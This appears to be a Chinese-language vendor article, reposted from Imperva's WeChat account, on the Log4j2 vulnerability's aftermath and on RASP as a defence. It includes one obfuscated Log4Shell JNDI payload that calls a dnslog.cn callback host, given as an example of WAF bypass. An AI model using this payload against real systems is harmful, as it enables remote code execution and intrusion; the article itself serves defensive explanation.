1 Log4j漏洞余波未平

此次Apache Log4j2远程代码执行漏洞影响面广，利用门槛低，危害还极大，堪称“史诗级”的漏洞。

Java的应用极其广泛且生态庞大，而Log4j作为日志处理的基础组件被几乎所有应用程序所使用。该漏洞已爆发二周多，甲方团队连夜应急，但影响持续至今，网上流传的各种利用和绕过姿势还在层出不穷，影响面持续扩大。

1.1现有系统或者第三方平台补丁无法及时到位

甲方环境中应用众多，存在很多应用系统不能马上升级Log4j组件的情况。

另外，很多基础架构设备或系统、安全设备的系统也会使用Log4j组件，这就需要等待这些厂商来提供相应的补丁。这些补丁系统的开发进度完全依赖于厂商的响应速度。

1.2攻击绕过问题

此次漏洞攻击存在了大量的绕过方法和手段，例如使用各种变量和协议的嵌套绕过方式，利用log4j lookup功能支持一些特殊的写法来对字符做二次处理方式，导致流量特征非常复杂和隐蔽。

攻击绕过样例：

${${NXOLm:EBI:hrITPd:aqyJQ:rAXPqJ:-j}${HxytOU:SObEV:UvRXs:SlyueV:UgbDDe:-n}d${aSaJjy:cvMk:-i}:l${PyDFlJ:BVF:-d}${XSEzv:MjICWc:-a}${wntfIz:iDowOF:-p}://v8eai8.dnslog.cn/THip}

另外，程序本身的加密也可能带来无法利用网络流量特征来进行检测。

1.3一波未平一波又起

俗话说：福无双至，祸不单行。在2021-12-29又被发现新的Log4j漏洞CVE-2021-44832，实在是应接不暇。可能这也是Log4j在引起了更多人关注后，会有更多的漏洞被发现。

2 使用RASP更优雅的应对零日漏洞 

WAF的快速应对还依赖于漏洞特征的提取速度，也受到了前面提到的应用加密、各种变形绕过的限制，因此如果可以在应用的运行环境下部署RASP（Runtime Application Self-Protection）解决方案，则相当于获得了免疫的效果。RASP是注入到应用当中，和应用一起运行的安全检测技术，通过Hook关键函数对攻击的行为模式来进行检测，因此无需攻击特征签名，且不受到加密流量、变形绕过的干扰。

为了方便大家理解，这里我们专门针对此次Log4j的漏洞，录制了如何可以利用RASP进行默认防护的演示：

原文始发于微信公众号（IMPERVA）：如何从容的应对Log4j漏洞（RASP Demo）